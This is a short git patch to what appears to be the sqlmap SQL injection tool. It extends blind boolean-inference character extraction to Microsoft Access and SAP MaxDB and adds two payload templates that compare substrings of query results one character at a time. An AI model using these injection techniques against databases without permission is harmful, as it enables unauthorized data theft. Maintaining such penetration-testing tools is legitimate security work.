From 98f5586b87d02cebbfdef41605042e8886b0c194 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 23 Oct 2010 08:05:24 +0000
Subject: [PATCH] minor update

---
 lib/techniques/blind/inference.py | 12 +++++++-----
 xml/queries.xml                   |  2 ++
 2 files changed, 9 insertions(+), 5 deletions(-)

diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index b978c23b0..bb97112a6 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -17,6 +17,8 @@ from lib.core.common import dataToStdout
 from lib.core.common import getCharset
 from lib.core.common import goGoodSamaritan
 from lib.core.common import getPartRun
+from lib.core.common import popValue
+from lib.core.common import pushValue
 from lib.core.common import readInput
 from lib.core.common import replaceNewlineTabs
 from lib.core.common import safeStringFormat
@@ -113,7 +115,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
         hintlock.release()
 
         if hintValue is not None and len(hintValue) >= idx:
-            if kb.dbms == "SQLite":
+            if kb.dbms in ("SQLite", "Microsoft Access", "SAP MaxDB"):
                 posValue = hintValue[idx-1]
             else:
                 posValue = ord(hintValue[idx-1])
@@ -165,8 +167,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
             position = (len(charTbl) >> 1)
             posValue = charTbl[position]
 
-            if kb.dbms == "SQLite":
-                posValueOld = posValue
+            if kb.dbms in ("SQLite", "Microsoft Access", "SAP MaxDB"):
+                pushValue(posValue)
                 posValue = chr(posValue) if posValue < 128 else unichr(posValue)
 
             forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
@@ -174,8 +176,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
             queriesCount[0] += 1
             result = Request.queryPage(urlencode(forgedPayload))
 
-            if kb.dbms == "SQLite":
-                posValue = posValueOld
+            if kb.dbms in ("SQLite", "Microsoft Access", "SAP MaxDB"):
+                posValue = popValue()
 
             if result:
                 minValue = posValue
diff --git a/xml/queries.xml b/xml/queries.xml
index 9a6fa34ac..2fce488f3 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -354,6 +354,7 @@
         <timedelay/>
         <substring query="MID((%s), %d, %d)"/>
         <case query="IIF(%s,1,0)"/>
+        <inference query="AND MID((%s), %d, 1) > '%s'"/>
         <banner/>
         <current_user query="SELECT CURRENTUSER()"/>
         <current_db/>
@@ -429,6 +430,7 @@
         <current_db query="SELECT DATABASE() FROM DUAL"/>
         <order query="ORDER BY %s ASC"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        <inference query="AND SUBSTR((%s), %d, 1) > '%s'"/>
         <delimiter query=","/>
         <substring query="SUBSTR((%s), %d, %d)"/>
    </dbms>